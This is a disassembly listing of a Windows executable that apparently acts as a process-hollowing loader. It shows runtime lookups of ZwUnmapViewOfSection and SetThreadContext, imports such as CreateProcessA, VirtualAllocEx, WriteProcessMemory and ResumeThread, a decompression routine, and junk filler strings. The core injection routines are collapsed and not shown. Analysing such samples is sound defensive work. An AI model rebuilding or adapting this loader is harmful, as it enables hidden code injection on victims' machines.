; [00000066 BYTES: COLLAPSED FUNCTION ___security_init_cookie. PRESS KEYPAD "+" TO EXPAND]
; [00000147 BYTES: COLLAPSED FUNCTION ___security_error_handler. PRESS KEYPAD "+" TO EXPAND]
align 2
___buffer_overrun:
push 0
push 1
call ___security_error_handler
; ---------------------------------------------------------------------------
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov ecx, [esp+4]
mov eax, dword_444B7C
mov dword_444B7C, ecx
retn
; [00000043 BYTES: COLLAPSED FUNCTION ___ansicp. PRESS KEYPAD "+" TO EXPAND]
; [000001C9 BYTES: COLLAPSED FUNCTION ___convertcp. PRESS KEYPAD "+" TO EXPAND]
; [0000007B BYTES: COLLAPSED FUNCTION _calloc. PRESS KEYPAD "+" TO EXPAND]
; [000000E3 BYTES: COLLAPSED FUNCTION __resetstkoflw. PRESS KEYPAD "+" TO EXPAND]
; [00000232 BYTES: COLLAPSED FUNCTION ___ld12mul. PRESS KEYPAD "+" TO EXPAND]
; [00000086 BYTES: COLLAPSED FUNCTION ___multtenpow12. PRESS KEYPAD "+" TO EXPAND]
; [00000058 BYTES: COLLAPSED FUNCTION _atol. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
jmp _atol
; [00000079 BYTES: COLLAPSED FUNCTION __atoi64. PRESS KEYPAD "+" TO EXPAND]
; [00000090 BYTES: COLLAPSED FUNCTION __ismbcspace. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000034 BYTES: COLLAPSED FUNCTION __allmul. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
jmp ds:FreeLibrary
; ---------------------------------------------------------------------------
jmp ds:GetProcAddress
; ---------------------------------------------------------------------------
jmp ds:LoadLibraryA
; ---------------------------------------------------------------------------
jmp ds:VirtualQueryEx
; ---------------------------------------------------------------------------
jmp ds:ReadProcessMemory
; ---------------------------------------------------------------------------
jmp ds:GetThreadContext
; ---------------------------------------------------------------------------
jmp ds:CreateProcessA
; ---------------------------------------------------------------------------
jmp ds:GetModuleHandleA
; ---------------------------------------------------------------------------
jmp ds:VirtualProtectEx
; ---------------------------------------------------------------------------
jmp ds:VirtualAllocEx
; ---------------------------------------------------------------------------
jmp ds:ResumeThread
; ---------------------------------------------------------------------------
jmp ds:ReadFile
; ---------------------------------------------------------------------------
jmp ds:GetFileSize
; ---------------------------------------------------------------------------
jmp ds:CreateFileA
; ---------------------------------------------------------------------------
jmp ds:SetFileAttributesA
; ---------------------------------------------------------------------------
jmp ds:GetModuleFileNameA
; ---------------------------------------------------------------------------
jmp ds:HeapAlloc
; ---------------------------------------------------------------------------
jmp ds:GetStartupInfoA
; ---------------------------------------------------------------------------
jmp ds:GetCommandLineA
; ---------------------------------------------------------------------------
jmp ds:GetVersionExA
; ---------------------------------------------------------------------------
jmp ds:HeapDestroy
; ---------------------------------------------------------------------------
jmp ds:HeapCreate
; ---------------------------------------------------------------------------
jmp ds:VirtualFree
; ---------------------------------------------------------------------------
jmp ds:HeapFree
; ---------------------------------------------------------------------------
jmp ds:VirtualAlloc
; ---------------------------------------------------------------------------
jmp ds:HeapReAlloc
; ---------------------------------------------------------------------------
jmp ds:IsBadWritePtr
; ---------------------------------------------------------------------------
jmp ds:ExitProcess
; ---------------------------------------------------------------------------
jmp ds:TerminateProcess
; ---------------------------------------------------------------------------
jmp ds:GetCurrentProcess
; ---------------------------------------------------------------------------
jmp ds:WriteFile
; ---------------------------------------------------------------------------
jmp ds:GetStdHandle
; ---------------------------------------------------------------------------
jmp ds:UnhandledExceptionFilter
; ---------------------------------------------------------------------------
jmp ds:FreeEnvironmentStringsA
; ---------------------------------------------------------------------------
jmp ds:GetEnvironmentStrings
; ---------------------------------------------------------------------------
jmp ds:FreeEnvironmentStringsW
; ---------------------------------------------------------------------------
jmp ds:WideCharToMultiByte
; ---------------------------------------------------------------------------
jmp ds:GetLastError
; ---------------------------------------------------------------------------
jmp ds:GetEnvironmentStringsW
; ---------------------------------------------------------------------------
jmp ds:SetHandleCount
; ---------------------------------------------------------------------------
jmp ds:GetFileType
; ---------------------------------------------------------------------------
jmp ds:GetACP
; ---------------------------------------------------------------------------
jmp ds:GetOEMCP
; ---------------------------------------------------------------------------
jmp ds:GetCPInfo
; [00000006 BYTES: COLLAPSED FUNCTION RtlUnwind. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
jmp ds:InterlockedExchange
; ---------------------------------------------------------------------------
jmp ds:VirtualQuery
; ---------------------------------------------------------------------------
jmp ds:GetStringTypeA
; ---------------------------------------------------------------------------
jmp ds:MultiByteToWideChar
; ---------------------------------------------------------------------------
jmp ds:GetStringTypeW
; ---------------------------------------------------------------------------
jmp ds:LCMapStringA
; ---------------------------------------------------------------------------
jmp ds:LCMapStringW
; ---------------------------------------------------------------------------
jmp ds:HeapSize
; ---------------------------------------------------------------------------
jmp ds:QueryPerformanceCounter
; ---------------------------------------------------------------------------
jmp ds:GetTickCount
; ---------------------------------------------------------------------------
jmp ds:GetCurrentThreadId
; ---------------------------------------------------------------------------
jmp ds:GetCurrentProcessId
; ---------------------------------------------------------------------------
jmp ds:GetSystemTimeAsFileTime
; ---------------------------------------------------------------------------
jmp ds:GetLocaleInfoA
; ---------------------------------------------------------------------------
jmp ds:VirtualProtect
; ---------------------------------------------------------------------------
jmp ds:GetSystemInfo
; ---------------------------------------------------------------------------
jmp ds:MessageBoxA
; =============== S U B R O U T I N E =======================================
sub_4079E8 proc near ; DATA XREF: .data:0040A008�o
push offset aSetthreadconte ; "SetThreadContext"
push offset ModuleName ; "kernel32.dll"
call ds:GetModuleHandleA ; GetModuleHandleA
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_444930, eax
retn
sub_4079E8 endp
; =============== S U B R O U T I N E =======================================
sub_407A05 proc near ; DATA XREF: .data:0040A00C�o
push offset aZwunmapviewofs ; "ZwUnmapViewOfSection"
push offset LibFileName ; "ntdll.dll"
call ds:GetModuleHandleA ; GetModuleHandleA
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_44492C, eax
retn
sub_407A05 endp
; ---------------------------------------------------------------------------
align 200h
_text ends
; Section 2. (virtual address 00008000)
; Virtual size : 000014E2 ( 5346.)
; Section size in file : 00001600 ( 5632.)
; Offset to raw data for section: 00007000
; Flags 40000040: Data Readable
; Alignment : default
;
; Imports from KERNEL32.dll
;
; ===========================================================================
; Segment type: Externs
; _idata
; BOOL __stdcall FreeLibrary(HMODULE hLibModule)
extrn FreeLibrary:dword ; CODE XREF: sub_401000+77�p
; DATA XREF: sub_401000+77�r ...
; FARPROC __stdcall GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
extrn GetProcAddress:dword ; CODE XREF: sub_401000+3A�p
; sub_401000+45�p ...
; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
extrn LoadLibraryA:dword ; CODE XREF: sub_401000+21�p
; ___crtMessageBoxA+18�p
; DATA XREF: ...
; SIZE_T __stdcall VirtualQueryEx(HANDLE hProcess, LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength)
extrn VirtualQueryEx:dword ; CODE XREF: sub_40150A+11�p
; DATA XREF: sub_40150A+11�r ...
; BOOL __stdcall ReadProcessMemory(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesRead)
extrn ReadProcessMemory:dword ; CODE XREF: sub_401522+61�p
; DATA XREF: sub_401522+61�r ...
; BOOL __stdcall GetThreadContext(HANDLE hThread, LPCONTEXT lpContext)
extrn GetThreadContext:dword ; CODE XREF: sub_401522+46�p
; DATA XREF: sub_401522+46�r ...
; BOOL __stdcall CreateProcessA(LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation)
extrn CreateProcessA:dword ; CODE XREF: sub_401522+2A�p
; DATA XREF: sub_401522+2A�r ...
; HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName)
extrn GetModuleHandleA:dword ; CODE XREF: sub_40165D+E2�p
; WinMain(x,x,x,x)+4F�p ...
; BOOL __stdcall VirtualProtectEx(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect)
extrn VirtualProtectEx:dword ; CODE XREF: sub_40165D+3A�p
; DATA XREF: sub_40165D+3A�r ...
; LPVOID __stdcall VirtualAllocEx(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
extrn VirtualAllocEx:dword ; CODE XREF: sub_40165D+72�p
; sub_40165D+9E�p
; DATA XREF: ...
; DWORD __stdcall ResumeThread(HANDLE hThread)
extrn ResumeThread:dword ; CODE XREF: sub_4017C4+D�p
; DATA XREF: sub_4017C4+D�r ...
; BOOL __stdcall ReadFile(HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped)
extrn ReadFile:dword ; CODE XREF: sub_4017D8+52�p
; DATA XREF: sub_4017D8+52�r ...
; DWORD __stdcall GetFileSize(HANDLE hFile, LPDWORD lpFileSizeHigh)
extrn GetFileSize:dword ; CODE XREF: sub_4017D8+28�p
; DATA XREF: sub_4017D8+28�r ...
; HANDLE __stdcall CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile)
extrn CreateFileA:dword ; CODE XREF: sub_4017D8+1B�p
; DATA XREF: sub_4017D8+1B�r ...
; BOOL __stdcall SetFileAttributesA(LPCSTR lpFileName, DWORD dwFileAttributes)
extrn SetFileAttributesA:dword ; CODE XREF: WinMain(x,x,x,x)+39�p
; DATA XREF: WinMain(x,x,x,x)+39�r ...
; DWORD __stdcall GetModuleFileNameA(HMODULE hModule, LPCH lpFilename, DWORD nSize)
extrn GetModuleFileNameA:dword ; CODE XREF: WinMain(x,x,x,x)+1B�p
; __NMSG_WRITE+81�p ...
; LPVOID __stdcall HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes)
extrn HeapAlloc:dword ; CODE XREF: __heap_alloc+3E�p
; ___sbh_heap_init+D�p ...
; void __stdcall GetStartupInfoA(LPSTARTUPINFOA lpStartupInfo)
extrn GetStartupInfoA:dword ; CODE XREF: start+160�p
; __ioinit+57�p
; DATA XREF: ...
; LPSTR __stdcall GetCommandLineA()
extrn GetCommandLineA:dword ; CODE XREF: start:loc_402074�p
; DATA XREF: start:loc_402074�r ...
; BOOL __stdcall GetVersionExA(LPOSVERSIONINFOA lpVersionInformation)
extrn GetVersionExA:dword ; CODE XREF: start+20�p
; DATA XREF: start+20�r ...
; BOOL __stdcall HeapDestroy(HANDLE hHeap)
extrn HeapDestroy:dword ; CODE XREF: __heap_init+44�p
; .text:00402227�p
; DATA XREF: ...
; HANDLE __stdcall HeapCreate(DWORD flOptions, SIZE_T dwInitialSize, SIZE_T dwMaximumSize)
extrn HeapCreate:dword ; CODE XREF: __heap_init+11�p
; DATA XREF: __heap_init+11�r ...
; BOOL __stdcall VirtualFree(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType)
extrn VirtualFree:dword ; CODE XREF: .text:004021E7�p
; .text:004021F2�p ...
; BOOL __stdcall HeapFree(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem)
extrn HeapFree:dword ; CODE XREF: .text:004021FF�p
; .text:0040221D�p ...
; LPVOID __stdcall VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect)
extrn VirtualAlloc:dword ; CODE XREF: ___sbh_alloc_new_region+7E�p
; ___sbh_alloc_new_group+52�p ...
; LPVOID __stdcall HeapReAlloc(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem, SIZE_T dwBytes)
extrn HeapReAlloc:dword ; CODE XREF: ___sbh_alloc_new_region+27�p
; _realloc+FD�p ...
; BOOL __stdcall IsBadWritePtr(LPVOID lp, UINT_PTR ucb)
extrn IsBadWritePtr:dword ; CODE XREF: ___sbh_heap_check+1B�p
; ___sbh_heap_check+55�p ...
; void __stdcall ExitProcess(UINT uExitCode)
extrn ExitProcess:dword ; CODE XREF: unknown_libname_1+29�p
; sub_4055F5-7�p
; DATA XREF: ...
; BOOL __stdcall TerminateProcess(HANDLE hProcess, UINT uExitCode)
extrn TerminateProcess:dword ; CODE XREF: _doexit+1A�p
; DATA XREF: _doexit+1A�r ...
; HANDLE __stdcall GetCurrentProcess()
extrn GetCurrentProcess:dword ; CODE XREF: _doexit+13�p
; DATA XREF: _doexit+13�r ...
; BOOL __stdcall WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped)
extrn WriteFile:dword ; CODE XREF: __NMSG_WRITE+155�p
; DATA XREF: __NMSG_WRITE+155�r ...
; HANDLE __stdcall GetStdHandle(DWORD nStdHandle)
extrn GetStdHandle:dword ; CODE XREF: __NMSG_WRITE+14E�p
; __ioinit+157�p
; DATA XREF: ...
; LONG __stdcall UnhandledExceptionFilter(struct _EXCEPTION_POINTERS *ExceptionInfo)
extrn UnhandledExceptionFilter:dword ; CODE XREF: __XcptFilter+167�p
; DATA XREF: __XcptFilter+167�r ...
; BOOL __stdcall FreeEnvironmentStringsA(LPCH)
extrn FreeEnvironmentStringsA:dword
; CODE XREF: ___crtGetEnvironmentStringsA+113�p
; DATA XREF: ___crtGetEnvironmentStringsA+113�r ...
; LPCH __stdcall GetEnvironmentStrings()
extrn GetEnvironmentStrings:dword
; CODE XREF: ___crtGetEnvironmentStringsA:loc_403FFF�p
; DATA XREF: ___crtGetEnvironmentStringsA:loc_403FFF�r ...
; BOOL __stdcall FreeEnvironmentStringsW(LPWCH)
extrn FreeEnvironmentStringsW:dword
; CODE XREF: ___crtGetEnvironmentStringsA+C1�p
; DATA XREF: ___crtGetEnvironmentStringsA+C1�r ...
; int __stdcall WideCharToMultiByte(UINT CodePage, DWORD dwFlags, LPCWSTR lpWideCharStr, int cchWideChar, LPSTR lpMultiByteStr, int cbMultiByte, LPCSTR lpDefaultChar, LPBOOL lpUsedDefaultChar)
extrn WideCharToMultiByte:dword
; CODE XREF: ___crtGetEnvironmentStringsA+86�p
; ___crtGetEnvironmentStringsA+A8�p ...
; DWORD __stdcall GetLastError()
extrn GetLastError:dword
; CODE XREF: ___crtGetEnvironmentStringsA:loc_403F58�p
; ___crtGetStringTypeA:loc_405ED9�p ...
; LPWCH __stdcall GetEnvironmentStringsW()
extrn GetEnvironmentStringsW:dword
; CODE XREF: ___crtGetEnvironmentStringsA+1C�p
; ___crtGetEnvironmentStringsA+52�p
; DATA XREF: ...
; UINT __stdcall SetHandleCount(UINT uNumber)
extrn SetHandleCount:dword ; CODE XREF: __ioinit+19C�p
; DATA XREF: __ioinit+19C�r ...
; DWORD __stdcall GetFileType(HANDLE hFile)
extrn GetFileType:dword ; CODE XREF: __ioinit+FE�p
; __ioinit+165�p
; DATA XREF: ...
; UINT __stdcall GetACP()
extrn GetACP:dword ; CODE XREF: __setmbcp+42�p
; DATA XREF: .text:0040573E�r ...
; UINT __stdcall GetOEMCP()
extrn GetOEMCP:dword ; CODE XREF: __setmbcp+2B�p
; DATA XREF: .text:00405729�r ...
; BOOL __stdcall GetCPInfo(UINT CodePage, LPCPINFO lpCPInfo)
extrn GetCPInfo:dword ; CODE XREF: _setSBUpLow+1C�p
; __setmbcp+93�p ...
extrn __imp_RtlUnwind:dword ; DATA XREF: RtlUnwind�r
; LONG __stdcall InterlockedExchange(volatile LONG *Target, LONG Value)
extrn InterlockedExchange:dword ; CODE XREF: __ValidateEH3RN+131�p
; __ValidateEH3RN+196�p ...
; SIZE_T __stdcall VirtualQuery(LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength)
extrn VirtualQuery:dword ; CODE XREF: __ValidateEH3RN+B3�p
; __resetstkoflw+1A�p ...
; BOOL __stdcall GetStringTypeA(LCID Locale, DWORD dwInfoType, LPCSTR lpSrcStr, int cchSrc, LPWORD lpCharType)
extrn GetStringTypeA:dword ; CODE XREF: ___crtGetStringTypeA+19C�p
; DATA XREF: ___crtGetStringTypeA+19C�r ...
; int __stdcall MultiByteToWideChar(UINT CodePage, DWORD dwFlags, LPCSTR lpMultiByteStr, int cbMultiByte, LPWSTR lpWideCharStr, int cchWideChar)
extrn MultiByteToWideChar:dword ; CODE XREF: ___crtGetStringTypeA+98�p
; ___crtGetStringTypeA+116�p ...
; BOOL __stdcall GetStringTypeW(DWORD dwInfoType, LPCWSTR lpSrcStr, int cchSrc, LPWORD lpCharType)
extrn GetStringTypeW:dword ; CODE XREF: ___crtGetStringTypeA+24�p
; ___crtGetStringTypeA+128�p
; DATA XREF: ...
; int __stdcall LCMapStringA(LCID Locale, DWORD dwMapFlags, LPCSTR lpSrcStr, int cchSrc, LPSTR lpDestStr, int cchDest)
extrn LCMapStringA:dword ; CODE XREF: ___crtLCMapStringA+2C3�p
; ___crtLCMapStringA+344�p ...
; int __stdcall LCMapStringW(LCID Locale, DWORD dwMapFlags, LPCWSTR lpSrcStr, int cchSrc, LPWSTR lpDestStr, int cchDest)
extrn LCMapStringW:dword ; CODE XREF: ___crtLCMapStringA+27�p
; ___crtLCMapStringA+15B�p ...
; SIZE_T __stdcall HeapSize(HANDLE hHeap, DWORD dwFlags, LPCVOID lpMem)
extrn HeapSize:dword ; CODE XREF: __msize+30�p
; DATA XREF: __msize+30�r ...
; BOOL __stdcall QueryPerformanceCounter(LARGE_INTEGER *lpPerformanceCount)
extrn QueryPerformanceCounter:dword ; CODE XREF: ___security_init_cookie+43�p
; DATA XREF: ___security_init_cookie+43�r ...
; DWORD __stdcall GetTickCount()
extrn GetTickCount:dword ; CODE XREF: ___security_init_cookie+37�p
; DATA XREF: ___security_init_cookie+37�r ...
; DWORD __stdcall GetCurrentThreadId()
extrn GetCurrentThreadId:dword ; CODE XREF: ___security_init_cookie+2F�p
; DATA XREF: ___security_init_cookie+2F�r ...
; DWORD __stdcall GetCurrentProcessId()
extrn GetCurrentProcessId:dword ; CODE XREF: ___security_init_cookie+27�p
; DATA XREF: ___security_init_cookie+27�r ...
; void __stdcall GetSystemTimeAsFileTime(LPFILETIME lpSystemTimeAsFileTime)
extrn GetSystemTimeAsFileTime:dword ; CODE XREF: ___security_init_cookie+1B�p
; DATA XREF: ___security_init_cookie+1B�r ...
; int __stdcall GetLocaleInfoA(LCID Locale, LCTYPE LCType, LPSTR lpLCData, int cchData)
extrn GetLocaleInfoA:dword ; CODE XREF: ___ansicp+20�p
; DATA XREF: ___ansicp+20�r ...
; BOOL __stdcall VirtualProtect(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect)
extrn VirtualProtect:dword ; CODE XREF: __resetstkoflw+D5�p
; DATA XREF: __resetstkoflw+D5�r ...
; void __stdcall GetSystemInfo(LPSYSTEM_INFO lpSystemInfo)
extrn GetSystemInfo:dword ; CODE XREF: __resetstkoflw+2B�p
; DATA XREF: __resetstkoflw+2B�r ...
;
; Imports from USER32.dll
;
; int __stdcall MessageBoxA(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType)
extrn MessageBoxA:dword ; CODE XREF: sub_4010AD+1A�p
; sub_401522+F2�p
; DATA XREF: ...
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 4080FCh
align 10h
; char aRtlgetcompress[]
aRtlgetcompress db 'RtlGetCompressionWorkSpaceSize',0 ; DATA XREF: sub_401000+3C�o
align 10h
; char ProcName[]
ProcName db 'RtlDecompressBuffer',0 ; DATA XREF: sub_401000+34�o
; char LibFileName[]
LibFileName db 'ntdll.dll',0 ; DATA XREF: sub_401000+1C�o
; sub_407A05+5�o
align 10h
; char Text[]
Text db 'uiytrikjhgkjhgkjhgkjhgkjhg',0 ; DATA XREF: sub_4010AD+11�o
align 4
; char Caption[]
Caption db 'ghgfhgfhgfdh gfdhgfdhfdkjhityru67uiytuiyf',0 ; DATA XREF: sub_4010AD+C�o
align 4
; char aGyuyyyyyyyyhgg[]
aGyuyyyyyyyyhgg db 'gyuyyyyyyyyhggggggggggfdgfdhjhhhhhhhhhhhhhhhhhhhhhhhgjshfdgfdjfjj'
; DATA XREF: sub_401522+EC�o
db 'jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjhgfdsjfdhgsjfdhgfdhsjghfdsjh shf'
db 'dkg sfdghsjfdhgshfdkghfdskg',0
; char byte_408226[]
byte_408226 db 2 dup(0) ; DATA XREF: sub_401522+E7�o
; __wincmdln+1B�o
dbl_408228 dq 1.0e2 ; DATA XREF: sub_401522:loc_4015A3�r
dbl_408230 dq 4.294967296e9 ; DATA XREF: sub_401522+7B�r
; char ModuleName[]
ModuleName db 'kernel32.dll',0 ; DATA XREF: sub_40165D+DD�o
; WinMain(x,x,x,x)+4A�o ...
align 4
; char aWriteprocessme[]
aWriteprocessme db 'WriteProcessMemory',0 ; DATA XREF: sub_40165D+D8�o
; WinMain(x,x,x,x)+E6�o
align 4
; char aVirtualalloc[]
aVirtualalloc db 'VirtualAlloc',0 ; DATA XREF: WinMain(x,x,x,x)+45�o
align 4
; char aSetthreadconte[]
aSetthreadconte db 'SetThreadContext',0 ; DATA XREF: sub_4079E8�o
align 10h
; char aZwunmapviewofs[]
aZwunmapviewofs db 'ZwUnmapViewOfSection',0 ; DATA XREF: sub_407A05�o
align 4
; const CHAR stru_408298
stru_408298 _msEH <0FFFFFFFFh, offset loc_40210A, offset loc_40211E>
; DATA XREF: start+2�o
align 8
dbl_4082A8 dq 0.0 ; DATA XREF: .text:0040328B�r
; char aE000[]
aE000 db 'e+000',0 ; DATA XREF: __cftoe+93�o
align 4
dbl_4082B8 dq 1.0 ; DATA XREF: __ms_p5_test_fdiv+2A�r
dbl_4082C0 dq 4.195835e6 ; DATA XREF: __ms_p5_test_fdiv+F�r
dbl_4082C8 dq 3.145727e6 ; DATA XREF: __ms_p5_test_fdiv+6�r
; char aIsprocessorfea[]
aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: __ms_p5_mp_test_fdiv+F�o
align 4
; char aKernel32[]
aKernel32 db 'KERNEL32',0 ; DATA XREF: __ms_p5_mp_test_fdiv�o
align 4
; char aCorexitprocess[]
aCorexitprocess db 'CorExitProcess',0 ; DATA XREF: unknown_libname_1+F�o
align 4
; char aMscoree_dll[]
aMscoree_dll db 'mscoree.dll',0 ; DATA XREF: unknown_libname_1�o
aRuntimeError db 'runtime error ',0
align 4
db 0Dh,0Ah,0
align 4
aTlossError db 'TLOSS error',0Dh,0Ah,0
align 4
aSingError db 'SING error',0Dh,0Ah,0
align 4
aDomainError db 'DOMAIN error',0Dh,0Ah,0
align 4
aR6029ThisAppli db 'R6029',0Dh,0Ah
db '- This application cannot run using the active version of the Mic'
db 'rosoft .NET Runtime',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 4
aR6028UnableToI db 'R6028',0Dh,0Ah
db '- unable to initialize heap',0Dh,0Ah,0
align 4
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 10h
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aThisApplicatio db 0Dh,0Ah
db 'This application has requested the Runtime to terminate it in an '
db 'unusual way.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 10h
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .data:off_40A08C�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: __NMSG_WRITE+123�o
; ___security_error_handler+132�o
align 10h
; char asc_4086E0[]
asc_4086E0 db 0Ah ; DATA XREF: __NMSG_WRITE+107�o
; ___security_error_handler+FC�o
db 0Ah,0
align 4
; char aRuntimeErrorPr[]
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: __NMSG_WRITE+F5�o
db 0Ah
db 'Program: ',0
align 10h
; char a___[]
a___ db '...',0 ; DATA XREF: __NMSG_WRITE+C1�o
; ___security_error_handler+CC�o
; char aProgramNameUnk[]
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: __NMSG_WRITE+8E�o
; ___security_error_handler+8B�o
align 10h
stru_408720 _msEH <0FFFFFFFFh, offset loc_404245, offset loc_404249>
; DATA XREF: sub_404218+2�o
align 10h
stru_408730 _msEH <0FFFFFFFFh, offset loc_404289, offset loc_40428D>
; DATA XREF: sub_40425C+2�o
dd 41h dup(0)
asc_408840: ; DATA XREF: .data:off_40A1BC�o
unicode 0, < ((((( H>
dw 10h
dd 7 dup(100010h), 5 dup(840084h), 3 dup(100010h), 810010h
dd 2 dup(810081h), 10081h, 9 dup(10001h), 100001h, 2 dup(100010h)
dd 820010h, 2 dup(820082h), 20082h, 9 dup(20002h), 100002h
dd 100010h, 200010h, 40h dup(0)
db 2 dup(0)
word_408A42 dw 20h ; DATA XREF: .data:off_40A1C0�o
aHH:
unicode 0, < h(((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(1810181h), 0Ah dup(1010101h), 3 dup(100010h)
dd 3 dup(1820182h), 0Ah dup(1020102h), 2 dup(100010h)
dd 10h dup(200020h), 480020h, 8 dup(100010h), 140010h
dd 100014h, 2 dup(100010h), 100014h, 2 dup(100010h), 1010010h
dd 0Bh dup(1010101h), 1010010h, 3 dup(1010101h), 0Ch dup(1020102h)
dd 1020010h, 3 dup(1020102h), 1010102h
; char aGetprocesswind[]
aGetprocesswind db 'GetProcessWindowStation',0 ; DATA XREF: ___crtMessageBoxA+73�o
; char aGetuserobjecti[]
aGetuserobjecti db 'GetUserObjectInformationA',0 ; DATA XREF: ___crtMessageBoxA+62�o
align 4
; char aGetlastactivep[]
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: ___crtMessageBoxA+47�o
align 4
; char aGetactivewindo[]
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: ___crtMessageBoxA+3F�o
; char aMessageboxa[]
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: ___crtMessageBoxA+2E�o
; char aUser32_dll[]
aUser32_dll db 'user32.dll',0 ; DATA XREF: ___crtMessageBoxA+13�o
align 8
stru_408CB8 _msEH <0FFFFFFFFh, offset sub_4055E1, offset sub_4055E5>
; DATA XREF: sub_4055F5-2F�o
; const WCHAR SrcStr
SrcStr dw 0 ; DATA XREF: ___crtGetStringTypeA+1E�o
; ___crtLCMapStringA+1C�o
align 4
stru_408CC8 _msEH <0FFFFFFFFh, offset loc_405F7C, offset loc_405F80>
; DATA XREF: ___crtGetStringTypeA+2�o
align 8
stru_408CD8 _msEH <0FFFFFFFFh, offset loc_406372, offset loc_406376>
; DATA XREF: ___crtLCMapStringA+2�o
dd 0FFFFFFFFh, 40616Fh, 406173h, 0FFFFFFFFh, 40623Dh, 406241h
; char a1Qnan[]
a1Qnan db '1#QNAN',0 ; DATA XREF: _$I10_OUTPUT:loc_406BAC�o
align 4
; char a1Inf[]
a1Inf db '1#INF',0 ; DATA XREF: _$I10_OUTPUT+CF�o
align 4
a1Ind db '1#IND',0 ; DATA XREF: _$I10_OUTPUT+BE�o
align 4
a1Snan db '1#SNAN',0 ; DATA XREF: _$I10_OUTPUT+A4�o
align 4
; char aProgram[]
aProgram db 'Program: ',0 ; DATA XREF: ___security_error_handler+108�o
align 4
aABufferOverrun db 'A buffer overrun has been detected which has corrupted the progra'
; DATA XREF: ___security_error_handler+62�o
db 'm',27h,'s',0Ah
db 'internal state. The program cannot safely continue execution and'
db ' must',0Ah
db 'now be terminated.',0Ah,0
aBufferOverrunD db 'Buffer overrun detected!',0
; DATA XREF: ___security_error_handler:loc_406FAB�o
align 8
aASecurityError db 'A security error of unknown cause has been detected which has',0Ah
; DATA XREF: ___security_error_handler+4C�o
db 'corrupted the program',27h,'s internal state. The program cannot sa'
db 'fely',0Ah
db 'continue execution and must now be terminated.',0Ah,0
align 4
; char aUnknownSecurit[]
aUnknownSecurit db 'Unknown security failure detected!',0
; DATA XREF: ___security_error_handler+47�o
align 10h
